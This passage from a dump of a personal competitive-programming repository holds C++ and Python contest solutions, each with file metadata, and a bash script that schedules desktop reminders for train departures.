= 0;\n while (n > a[i])\n i++;\n int count = a[i] - n;\n if (count == 0)\n return (int) (x + y <= 2 * i);\n if (x + y < 2 * i)\n return 1;\n if (x + y > 2 * i)\n return 0;\n if (y == 2 * i)\n return 0;\n count = n - a[i - 1];\n if (count - 2 * i > y)\n return 1;\n if (count < y)\n return 0;\n bool f = false;\n if (count > 2 * i)\n {\n count -= 2 * i;\n y = 2 * i - y;\n f = true;\n }\n //writeln(n, x, y, count);\n double h = co[count - 1][y];\n for (int j = 0; j < count; j++, h /= 2);\n return !f ? 
1.0 - h : h;\n}\n\nint main()\n{\n freopen(\"input1.txt\", \"r\", stdin);\n freopen(\"output.txt\", \"w+\", stdout);\n a.resize(1);\n a[0] = 1;\n for (int i = 1; a[i - 1] < 1000000;i++)\n a.push_back((2 * i + 1) * (i + 1));\n int T;\n readln(T);\n for (int tttt = 0; tttt < T; tttt++)\n {\n printf(\"Case #%d: \", tttt + 1);\n printf(\"%.8f\\n\", test());\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.44935065507888794, "alphanum_fraction": 0.4649350643157959, "avg_line_length": 19.263158798217773, "blob_id": "b14631598a9eeaa1ff3ee1fc3c81e2bf80634f49", "content_id": "374216f6f133d92a67c61f85b41333b3c5a5d849", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 385, "license_type": "no_license", "max_line_length": 50, "num_lines": 19, "path": "/TopCoder/2017-TCO-Algorithm/150/RangeEncoding.cc", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n\n#define fori(n) for(int i = 0; i < (int) (n); i++)\n#define forj(n) for(int j = 0; j < (int) (n); j++)\n\nusing namespace std;\n\nclass RangeEncoding \n{\npublic:\n int minRanges(vector <int> arr) \n {\n int ans = 1;\n for (int i = 1; i < arr.size(); ++i)\n if (arr[i] != arr[i - 1] + 1)\n ans++;\n return ans;\n }\n};\n" }, { "alpha_fraction": 0.5096279978752136, "alphanum_fraction": 0.6542669534683228, "avg_line_length": 35.560001373291016, "blob_id": "539b6b8e73e8c74c39f09b9c15a8455c043ea9f0", "content_id": "35cf9ccb0056a3365237f38c245419c98130b5c3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4570, "license_type": "no_license", "max_line_length": 66, "num_lines": 125, "path": "/CodeForce/1769/D3.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "k = int(input())\nif k == 26:\n print('''TC QC KC 6D 7D 8D 9D KD AD 9S KS AS 6H 9H JH QH KH AH\n6C 7C 8C 9C JC AC TD JD QD 6S 7S 8S TS JS QS 7H 8H TH\n\n6C 7C 8C TC JC KC 7D 9D QD AD 7S 8S TS JS QS 6H JH QH\n9C QC AC 
6D 8D TD JD KD 6S 9S KS AS 7H 8H 9H TH KH AH\n\n9C TC JC KC 6D 9D JD 7S 8S TS JS QS KS 6H 7H 8H TH KH\n6C 7C 8C QC AC 7D 8D TD QD KD AD 6S 9S AS 9H JH QH AH\n\n8C 9C JC QC AC TD JD KD AD 7S 9S KS AS 8H 9H JH KH AH\n6C 7C TC KC 6D 7D 8D 9D QD 6S 8S TS JS QS 6H 7H TH QH\n\n8C TC JC KC AC 6D 9D TD JD KD 6S 9S AS 6H 7H TH KH AH\n6C 7C 9C QC 7D 8D QD AD 7S 8S TS JS QS KS 8H 9H JH QH\n\n7C 9C TC QC 6D 8D TD JD QD KD 8S TS QS KS 9H TH JH QH\n6C 8C JC KC AC 7D 9D AD 6S 7S 9S JS AS 6H 7H 8H KH AH\n\n8C 9C JC 7D 8D TD JD KD AD 6S 8S 9S JS AS 6H 7H JH QH\n6C 7C TC QC KC AC 6D 9D QD 7S TS QS KS 8H 9H TH KH AH\n\n7C 9C JC KC 7D 9D QD 6S 7S 8S TS JS QS 6H 7H 8H JH AH\n6C 8C TC QC AC 6D 8D TD JD KD AD 9S KS AS 9H TH QH KH\n\n6C 7C 8C 9C JC QC AC 6D JD QD 7S JS QS KS 7H 9H QH KH\nTC KC 7D 8D 9D TD KD AD 6S 8S 9S TS AS 6H 8H TH JH AH\n\n6C 7C JC QC KC AC 7D TD JD KD AD 7S 9S KS 6H 8H 9H JH\n8C 9C TC 6D 8D 9D QD 6S 8S TS JS QS AS 7H TH QH KH AH\n\n8C TC JC QC 6D 9D QD KD AD 7S 8S TS JS KS AS 8H TH JH\n6C 7C 9C KC AC 7D 8D TD JD 6S 9S QS 6H 7H 9H QH KH AH\n\n6C 8C JC QC KC AC 8D TD QD KD AD 9S TS 6H 7H 8H JH KH\n7C 9C TC 6D 7D 9D JD 6S 7S 8S JS QS KS AS 9H TH QH AH\n\n6C 9C KC AC 8D JD QD 6S 7S TS JS QS 8H 9H JH QH KH AH\n7C 8C TC JC QC 6D 7D 9D TD KD AD 8S 9S KS AS 6H 7H TH\n\n7C 8C JC QC KC AC 8D 9D JD 6S 7S TS QS KS AS 7H 8H TH\n6C 9C TC 6D 7D TD QD KD AD 8S 9S JS 6H 9H JH QH KH AH\n\n8C AC 7D 8D 9D JD QD KD AD 8S 9S TS JS KS AS 6H 7H TH\n6C 7C 9C TC JC QC KC 6D TD 6S 7S QS 8H 9H JH QH KH AH\n\n8C 9C 6D 7D TD JD QD KD AD 9S QS KS 6H 8H JH QH KH AH\n6C 7C TC JC QC KC AC 8D 9D 6S 7S 8S TS JS AS 7H 9H TH\n\n7C 9C JC QC AC 7D 9D TD AD 9S 6H 7H 8H TH JH QH KH AH\n6C 8C TC KC 6D 8D JD QD KD 6S 7S 8S TS JS QS KS AS 9H\n\n8C 9C TC JC KC AC 7D 8D AD 9S 6H 7H 8H TH JH QH KH AH\n6C 7C QC 6D 9D TD JD QD KD 6S 7S 8S TS JS QS KS AS 9H\n\n6C 9C JC 6D 7D 8D TD KD AD 9S 6H 7H 8H TH JH QH KH AH\n7C 8C TC QC KC AC 9D JD QD 6S 7S 8S TS JS QS KS AS 9H\n\n7C TC AC 7D 8D 9D TD KD AD 9S 6H 7H 8H TH JH QH 
KH AH\n6C 8C 9C JC QC KC 6D JD QD 6S 7S 8S TS JS QS KS AS 9H\n\n8C TC JC 6D 7D 8D TD JD QD 9S 6H 7H 8H TH JH QH KH AH\n6C 7C 9C QC KC AC 9D KD AD 6S 7S 8S TS JS QS KS AS 9H\n\n9C JC QC KC AC 9D QD KD AD 9S 6H 7H 8H TH JH QH KH AH\n6C 7C 8C TC 6D 7D 8D TD JD 6S 7S 8S TS JS QS KS AS 9H\n\n6C 7C 8C TC JC QC KC AC 9D 9S 6H 7H 8H TH JH QH KH AH\n9C 6D 7D 8D TD JD QD KD AD 6S 7S 8S TS JS QS KS AS 9H\n\n7C 9C TC 6D 7D 8D QD KD AD 9S 6H 7H 8H TH JH QH KH AH\n6C 8C JC QC KC AC 9D TD JD 6S 7S 8S TS JS QS KS AS 9H\n\n8C 9C 6D 7D TD JD QD KD AD 9S 6H 7H 8H TH JH QH KH AH\n6C 7C TC JC QC KC AC 8D 9D 6S 7S 8S TS JS KS QS AS 9H\n\n6C 7C 8C TC QC KC AC 8D 9D 9S 6H 7H 8H TH JH QH KH AH\n9C JC 6D 7D TD JD QD KD AD 6S 7S 8S TS JS QS KS AS 9H''')\n\nif k == 13:\n print('''6C TC JC QC 6D 8D 9D TD JD QD KD 7S 8S TS JS KS AS TH\n7C 8C 9C KC AC 7D AD 6S 9S QS 6H 7H 8H 9H JH QH KH AH\n\n6C 8C AC 6D 8D TD JD KD 6S 8S 9S TS JS QS 8H JH KH AH\n7C 9C TC JC QC KC 7D 9D QD AD 7S KS AS 6H 7H 9H TH QH\n\n6C 8C 9C QC KC AC 6D 7D JD AD 8S JS 6H 7H 8H 9H QH AH\n7C TC JC 8D 9D TD QD KD 6S 7S 9S TS QS KS AS TH JH KH\n\n8C TC QC AC 6D 7D TD QD KD 6S 7S JS QS KS 7H 9H TH JH\n6C 7C 9C JC KC 8D 9D JD AD 8S 9S TS AS 6H 8H QH KH AH\n\n6C 9C KC 6D 7D TD JD KD AD TS JS QS AS 9H TH JH QH AH\n7C 8C TC JC QC AC 8D 9D QD 6S 7S 8S 9S KS 6H 7H 8H KH\n\n7C 9C TC QC KC 8D AD 6S 7S 8S 9S JS AS 6H 7H 8H JH KH\n6C 8C JC AC 6D 7D 9D TD JD QD KD TS QS KS 9H TH QH AH\n\nTC JC QC AC 7D 8D AD 7S TS JS QS KS 7H 9H TH JH QH AH\n6C 7C 8C 9C KC 6D 9D TD JD QD KD 6S 8S 9S AS 6H 8H KH\n\n9C QC KC 6D 7D JD QD 6S 7S 8S JS AS 6H 7H 9H TH KH AH\n6C 7C 8C TC JC AC 8D 9D TD KD AD 9S TS QS KS 8H JH QH\n\n6C 6D 7D 8D 9D TD JD QD AD 6S 7S 8S TS QS 7H 8H JH QH\n7C 8C 9C TC JC QC KC AC KD 9S JS KS AS 6H 9H TH KH AH\n\n6C 8C JC QC KC AC 8D 9D 7S TS JS QS AS 7H 8H TH QH AH\n7C 9C TC 6D 7D TD JD QD KD AD 6S 8S 9S KS 6H 9H JH KH\n\n8C 9C 6D 9D KD 6S 7S 8S TS JS QS KS AS 7H 8H 9H KH AH\n6C 7C TC JC QC KC AC 7D 8D TD JD QD AD 9S 6H TH JH QH\n\n7C 
8C 9C KC AC 6D 7D 9D JD 6S 8S TS QS KS AS 7H 9H QH\n6C TC JC QC 8D TD QD KD AD 7S 9S JS 6H 8H TH JH KH AH\n\n6C 8C JC KC AC 9D 9S TS QS KS AS 6H 7H 8H JH QH KH AH\n7C 9C TC QC 6D 7D 8D TD JD QD KD AD 6S 7S 8S JS 9H TH''')\nif k == 2:\n print('''KS QD 8D QC 8S 8C JD 9H AC TH 9S 9D QH 7H 8H TS 7S 9C\n6D JS 7D KH QS TC AD AS KC 6C 7C TD AH KD 6S JC JH 6H\n\nJC JS 8S TD JD KH 7D 9C KC TH QD 8D 7H TC KD 9H 8C 6D\n7S AC QH AD 8H TS 6H JH 6C AH 7C 6S 9D QC AS QS KS 9S''')\n" }, { "alpha_fraction": 0.5052106976509094, "alphanum_fraction": 0.5265065431594849, "avg_line_length": 35.78333282470703, "blob_id": "91420e2c53438769574300a1b814e5e7fa374b30", "content_id": "91cb0a5dc622a92ea4a4874381aaafe80b2a4fc3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2319, "license_type": "no_license", "max_line_length": 213, "num_lines": 60, "path": "/scripts/choose-train.sh", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nCOUNTER=1\nRADIOLIST=\"\" # variable where we will keep the list entries for radiolist dialog\nOLD=$IFS\nIFS=$'\\n' \nar=()\ncount=25\nminutesBefore=57\nchoose=\"/home/igorjan/new/Санкт-Петербург—Лигово.out\"\ngap=7\n\nOPTS=`getopt -o b:c:h:g: -l before:,count:,choose:,gap:,help -- \"$@\"`\nif [ $? 
!= 0 ]; then exit 1; fi\neval set -- \"$OPTS\"\n\nusage () {\n echo \"-o b:c:h:g: -l before:,count:,choose:,gap:,help\"\n exit 0\n}\n\n#parsing arguments\nwhile true ; do\n case \"$1\" in\n -h | --help ) usage ; shift;;\n -b | --before) minutesBefore=$2; shift 2;;\n -c | --count ) count=$2 ; shift 2;;\n -g | --gap ) gap=$2 ; shift 2;;\n --choose ) choose=$2 ; shift 2;;\n -- ) shift ; break;;\n esac\ndone\nminutesBeforeCritical=$(($minutesBefore - $gap))\n\n\nfor i in $(cat $choose | tail -$count); do\n train=${i:0:5}\n desc=${i:6}\n desc=`sed -E \"s/\\s+/ /g\" <<< $desc`\n desc=`sed \"s/^\\s//g\" <<< $desc`\n desc=`sed \"s/\\s$//g\" <<< $desc`\n off=off\n if [ \"$train\" == \"20:12\" ]; then off=on; fi\n ar+=($train \"$desc\" $off)\ndone\nIFS=$OLD\nexec 3>&1;\n\nresult=$(dialog --title \"Choose train\" --default-item \"20:12\" --radiolist \"Time\" 0 0 $count \"${ar[@]}\" 2>&1 1>&3);\n\nif [ ! -z \"$result\" ]; then\n exec 3>&-;\n minsWarning=`date +%H:%M --date \"$result -GMT+3 -$minutesBefore min\"`\n minsCritical=`date +%H:%M --date \"$result -GMT+3 -$minutesBeforeCritical min\"`\n spaces=\" \"\n for i in $(atq | cut -f 1); do atrm $i; done\n at \"$minsWarning\" <<< \"DISPLAY=:0 notify-send -u critical -i dialog-information 'Warning!!!' '\\n\\n\\nРаспидорит электричку $result. Осталось $minutesBefore минут до электрички! $spaces'\" 1>&2\n at \"$minsCritical\" <<< \"DISPLAY=:0 notify-send -u critical -i dialog-information 'Critical!!!' '\\n\\n\\nУже пидорит электричку $result. Осталось $minutesBeforeCritical минут до электрички! 
$spaces'\" 1>&2\n echo \"Notifications are installed to $minsWarning and $minsCritical!\"\nfi\n" }, { "alpha_fraction": 0.50535649061203, "alphanum_fraction": 0.5160694718360901, "avg_line_length": 36.0684928894043, "blob_id": "30b8e62e354ad0732bd6eb7c4de353c71512b367", "content_id": "5c5c17a3abe09f4650ac15ea081c241ee4933270", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2707, "license_type": "no_license", "max_line_length": 928, "num_lines": 73, "path": "/CodeForce/0369/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <math.h>\n#include <algorithm>\n#include <queue>\n#include <map>\n\n#define enter printf(\"\\n\");\n#define pb push_back\n#define ll long long\n#define fors(it, r) for (set<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forvit(it, r) for (vector<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forv(i, vector) for (int i = 0; i < vector.size(); i++)\n#define forn(i, n) for (int i = 0; i < n; i++)\n#define vi vector<int>\n\nusing namespace std;\nint INF = 1000000007;\nstring FILENAME = \"start\";\nstring FILEINPUT = FILENAME;\nint mx = 0;\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void 
readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\nvoid readln(vector<int> &f, int n){int x;for (int i = 1; i <= n; i++){read(x);f.push_back(x);mx=max(mx,x);}}void writeln(vector<int> &f){for (int i = 0; i < f.size(); i++)printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');}\n\nint n, k;\nvector< vector<pair<int, int> > > edges;\nvector<bool> used;\nvi a;\nint dfs(int u)\n{\n used[u] = true;\n int mx = 0;\n forn(i, edges[u].size())\n if (!used[edges[u][i].first])\n {\n int t = dfs(edges[u][i].first);\n if (edges[u][i].second && !t)\n {\n mx++;\n a.pb(edges[u][i].first + 1);\n }\n else\n mx += t;\n }\n return mx;\n}\n\nvoid run()\n{\n readln(n);\n edges.resize(n + 1);\n used.resize(n + 1, false);\n int x, y, t;\n forn(i, n - 1)\n {\n readln(x, y, t);\n edges[x - 1].pb({y - 1, t - 1});\n edges[y - 1].pb({x - 1, t - 1});\n }\n cout << dfs(0) << endl;\n writeln(a);\n}\n\nint main()\n{\n //freopen(FILEINPUT.append(\".in\").c_str(), \"r\", stdin);\n //freopen(FILENAME.append(\".out\").c_str(), \"w\", stdout);\n run();\n return 0;\n}\n\n" }, { "alpha_fraction": 0.5611814260482788, "alphanum_fraction": 0.5696202516555786, "avg_line_length": 32.85714340209961, "blob_id": "65bb154856d021f2fdc65d91af74d7ed5840cbca", "content_id": "6d800232c1ee35300b2a0d733579e9eef0bad05a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 237, "license_type": "no_license", "max_line_length": 47, "num_lines": 7, "path": "/trash/aplusb.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "f = open(\"aplusb.in\", \"r\")\nt = open(\"aplusb.out\", \"w\")\na, b = [float(x) for x in f.readline().split()]\nt.write(\"%.11f\\n\" % (a + b))\narray = [long(x) for x in f.readline().split()]\narray.reverse()\nt.writelines([\"%s \" % 
i for i in array])\n" }, { "alpha_fraction": 0.3632596731185913, "alphanum_fraction": 0.3667127192020416, "avg_line_length": 19.62686538696289, "blob_id": "21307965efdd1d2a55bbe710a20254d98d227633", "content_id": "aec8698e6a05238aca158cfc857b046e010621e1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1815, "license_type": "no_license", "max_line_length": 70, "num_lines": 67, "path": "/trains/neerc/neerc.ifmo.ru.train.2015.10.20/E.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <iostream>\r\n#include <cstdio>\r\n#include <bits/stdc++.h>\r\n \r\nusing namespace std;\r\n \r\nstruct event\r\n{\r\n    int x;\r\n    int y;\r\n    int i;\r\n    event(){}\r\n    event(int x, int y, int i) : x(x), y(y), i(i) {};\r\n};\r\n \r\nbool operator<(const event& a, const event& b)\r\n{\r\n    if (b.x == a.x)\r\n        if (b.y == a.y)\r\n            return b.i > a.i;\r\n        else\r\n            return b.y > a.y;\r\n    else\r\n        return b.x > a.x;\r\n}\r\n \r\n//ostream& operator<<(ostream&out, event x)\r\n//{\r\n    //return out << (x.y < 0 ? 
\"end\" : \"begin\") << \" \" << x.i << \"\\n\";\r\n//}\r\n \r\nint main() {\r\n    //freopen(\"input.txt\", \"r\", stdin);\r\n    int n, k;\r\n    vector<event> q;\r\n    scanf(\"%d%d\", &n, &k);\r\n    int x, y;\r\n    vector<bool> used(n, true);\r\n    set<pair<int, int>> s;\r\n    int ans = 0;\r\n    for (int i = 0; i < n; ++i)\r\n    {\r\n        scanf(\"%d%d\", &x, &y);\r\n        q.push_back(event(x, y, i));\r\n        q.push_back(event(y, -y, i));\r\n    }\r\n \r\n    sort(q.begin(), q.end());\r\n \r\n    for (int i = 0; i < q.size(); ++i)\r\n        if (used[q[i].i])\r\n        {\r\n            if (q[i].y < 0)\r\n            {\r\n                ans++;\r\n                s.erase({q[i].y, q[i].i});\r\n            }\r\n            else\r\n            {\r\n                s.insert({-q[i].y, q[i].i});\r\n                while (s.size() > k)\r\n                    used[s.begin()->second] = false,\r\n                    s.erase(s.begin());\r\n            }\r\n        }\r\n    cout << ans << \"\\n\";\r\n}\n" }, { "alpha_fraction": 0.4525805115699768, "alphanum_fraction": 0.46449050307273865, "avg_line_length": 33.34848403930664, "blob_id": "bfbc37b70f18209a99aaffc8477d0d54280570a0", "content_id": "02daf62ac14c58115d3b9a331063bf886d189b7f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2267, "license_type": "no_license", "max_line_length": 928, "num_lines": 66, "path": "/2013/2013RCC1/B.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#define enter printf(\"\\n\");\n\nusing namespace std;\nint INF = 1000000007;\nvector<int> a;\nvector< pair<int, int> > b;\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d 
%d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nvoid readln(vector<int> &f, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n read(x);\n f.push_back(x);\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n int x;\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');\n}\n\nint main()\n{\n freopen(\"input.txt\", \"r\", stdin);\n int t;\n int check;\n readln(t);\n for (int tt = 0; tt < t; tt++)\n {\n int n;\n readln(n);\n a.clear();\n b.clear();\n readln(a, n);\n sort(a.begin(), a.end());\n b.push_back(make_pair(a[0], 1));\n for (int i = 1; i < n; i++)\n if (a[i] == a[i - 1])\n b[b.size() - 1].second++; else\n b.push_back(make_pair(a[i], 1));\n n = b.size();\n int i = 0, j = 0;\n long long ans = 0;\n while (true)\n {\n if (b[i].second < 2)\n {\n i++;\n continue;\n }\n check = 2 * b[i].first + b[0].first;\n int temp = *upper_bound(a.begin(), a.end(), check);\n }\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.46683353185653687, "alphanum_fraction": 0.4762202799320221, "avg_line_length": 21.19444465637207, "blob_id": "e61127927529d575f911973243eee77b23e7ab11", "content_id": "06d60223836213072736dbd0c2515654d774afd3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1598, "license_type": 
"no_license", "max_line_length": 85, "num_lines": 72, "path": "/CodeForce/0382/B.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#include <queue>\n#define enter printf(\"\\n\")\n#define pb push_back\n#define ll long long\n#define fors(it, r) for (set<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forvit(it, r) for (vector<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forv(i, vector) for (int i = 0; i < vector.size(); i++)\n#define forn(i, n) for (int i = 0; i < n; i++)\n#define forn1(i, n) for (int i = 1; i < n; i++)\n#define fori(n) for (int i = 0; i < n; i++)\n#define forj(n) for (int j = 0; j < n; j++)\n#define vi vector<int>\n#define vll vector<long long>\n#define pii pair<int, int>\n\nusing namespace std;\n\nint main()\n{\n int a, b, w, x, c;\n cin >> a >> b >> w >> x >> c;\n if (c <= a)\n {\n cout << 0 << endl;\n return 0;\n }\n ll count = 0;\n int delta = 0;\n c -= a;\n vector<pii> v(w);\n vector<bool> used(w, false);\n fori(w)\n if (i >= x)\n v[i] = make_pair(i - x, 1);\n else\n v[i] = make_pair(i + w - x, 0);\n\n while (!used[b] && delta != c)\n {\n used[b] = true;\n delta += v[b].second;\n b = v[b].first;\n count++;\n }\n if (delta == c)\n {\n cout << count << endl;\n return 0;\n }\n\n if (c % delta)\n count = count * (c / delta),\n c %= delta;\n else\n count = count * (c / delta - 1),\n c = delta;\n\n while (c)\n {\n c -= v[b].second;\n b = v[b].first;\n count++;\n }\n cout << count << endl;\n return 0;\n}\n" }, { "alpha_fraction": 0.401025652885437, "alphanum_fraction": 0.4092307686805725, "avg_line_length": 19.103092193603516, "blob_id": "3b95e49404be19906d1ce5f4725f8b102928ebcd", "content_id": "c98c7ffaf10e8fcf3743f39cb0f6b483dd46d14c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1950, "license_type": "no_license", 
"max_line_length": 60, "num_lines": 97, "path": "/trains/neerc/neerc.ifmo.ru.train.2013.10.01/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <iostream>\n#include <fstream>\n#include <map>\n#include <vector>\n#include <set>\n#include <deque>\n#include <unordered_map>\n#include <unordered_set>\n#include <algorithm>\n#include <stdio.h>\n\n\ntypedef unsigned long long ull;\ntypedef long long ll;\n\n#define FN \"cave\"\n\nusing namespace std;\n\nstruct pp {\n int f, c;\n};\n\npp data[1000010];\n\nclass why {\npublic:\n bool operator()(int a, int b) {\n return data[a].c < data[b].c;\n }\n};\n\nint main()\n{\n //ifstream in(FN \".in\");\n //ofstream out(FN \".out\");\n //istream &in = cin;\n //ostream &out = cout;\n\n int t;\n //in >> t;\n scanf(\"%d\",&t);\n\n vector<int> order;\n\n for(int T = 1; T <= t; T++)\n {\n int n;\n //in >> n;\n scanf(\"%d\",&n);\n\n int total_area = 0;\n\n order.clear();\n order.reserve(n);\n for(int i = 0; i < n; i++)\n //in >> data[i].f;\n scanf(\"%d\",&data[i].f);\n for(int i = 0; i < n; i++)\n {\n //in >> data[i].c;\n scanf(\"%d\",&data[i].c);\n total_area += data[i].c-data[i].f;\n order.push_back(i);\n }\n\n sort(order.begin(),order.end(),why());\n\n for(int i = 0; i < n; i++)\n {\n int cx = order[i];\n int cc = data[cx].c;\n for(int j = cx-1; j >= 0; j--)\n {\n if(data[j].c < cc || data[j].f == data[j].c)\n break;\n cc = max(data[j].f,cc);\n total_area -= (data[j].c - cc);\n data[j].c = cc;\n }\n for(int j = cx+1; j < n; j++)\n {\n if(data[j].c < cc || data[j].f == data[j].c)\n break;\n cc = max(data[j].f,cc);\n total_area -= (data[j].c - cc);\n data[j].c = cc;\n }\n }\n\n //out << total_area;\n printf(\"%d\",total_area);\n }\n\n //out.close();\n return 0;\n}\n" }, { "alpha_fraction": 0.5180230140686035, "alphanum_fraction": 0.5328873991966248, "avg_line_length": 46.21052551269531, "blob_id": "df72dcd324fe39c32351dfe4783d6c2a82a68d6c", "content_id": "c8b7ab4b04566ed9e402850aac29330ec1c63d50", 
"detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2691, "license_type": "no_license", "max_line_length": 928, "num_lines": 57, "path": "/CodeForce/0382/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#include <queue>\n#define enter printf(\"\\n\")\n#define pb push_back\n#define ll long long\n#define fors(it, r) for (set<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forvit(it, r) for (vector<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forv(i, vector) for (int i = 0; i < vector.size(); i++)\n#define forn(i, n) for (int i = 0; i < n; i++)\n#define forn1(i, n) for (int i = 1; i < n; i++)\n#define fori(n) for (int i = 0; i < n; i++)\n#define forj(n) for (int j = 0; j < n; j++)\n#define vi vector<int>\n#define vll vector<long long>\n#define pii pair<int, int>\n\nusing namespace std;\nint INF = 1000000007;\nstring FILENAME = \"input\";\nstring FILEINPUT = FILENAME;\n\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int 
&a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\nvoid readln(vector<int> &f, int n){int x;for (int i = 1; i <= n; i++){read(x);f.push_back(x);}}void writeln(vector<int> &f){for (int i = 0; i < f.size(); i++)printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');}\n\nvoid run()\n{\n string s, s1;\n cin >> s >> s1;\n int k = s.find('|');\n int l = s1.size();\n int n = s.size() - k - 1;\n// writeln(n, k);\n int d = max(n, k) - min(n, k);\n l -= d;\n if (l < 0 || l % 2)\n {\n printf(\"Impossible\\n\");\n return;\n }\n if (k < n)\n printf(\"%s%s|%s%s\\n\", s.substr(0, k).c_str(), s1.substr(0, l / 2 + d).c_str(), s.substr(k + 1).c_str(), s1.substr(l / 2 + d).c_str());\n else\n printf(\"%s%s|%s%s\\n\", s.substr(0, k).c_str(), s1.substr(l / 2 + d).c_str(), s.substr(k + 1).c_str(), s1.substr(0, l / 2 + d).c_str());\n}\n\nint main()\n{\n //freopen(FILEINPUT.append(\".in\").c_str(), \"r\", stdin);\n //freopen(FILENAME.append(\".out\").c_str(), \"w\", stdout);\n run();\n return 0;\n}\n" }, { "alpha_fraction": 0.5276365876197815, 